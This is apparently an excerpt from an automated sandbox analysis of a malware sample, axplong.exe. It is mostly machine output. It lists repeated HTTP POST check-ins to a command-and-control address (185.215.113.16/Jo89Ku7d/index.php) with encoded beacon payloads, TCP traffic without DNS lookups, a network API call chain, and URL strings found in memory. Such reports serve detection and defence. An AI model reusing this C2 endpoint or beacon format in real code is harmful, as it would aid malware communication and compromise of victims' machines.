Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Joe Sandbox View

IP Address: 185.215.113.16 185.215.113.16

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown

DNS traffic detected: query: 241.42.69.40.in-addr.arpa replaycode: Name error (3)

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_00B2BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

6_2_00B2BD60

Source: global traffic

DNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.2995896267.0000000001386000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php$BG
Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php)
Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php.
Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php1
Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php4079-b30a-7368302a1ad4LMEMp
Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php6B
Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php=
Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php?
Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpI
Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpa
Source: axplong.exe, 00000006.00000002.2995896267.0000000001357000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpd
Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpdedgB
Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpi
Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpj
Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpm
Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedBB
Source: axplong.exe, 00000006.00000002.2995896267.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedlB
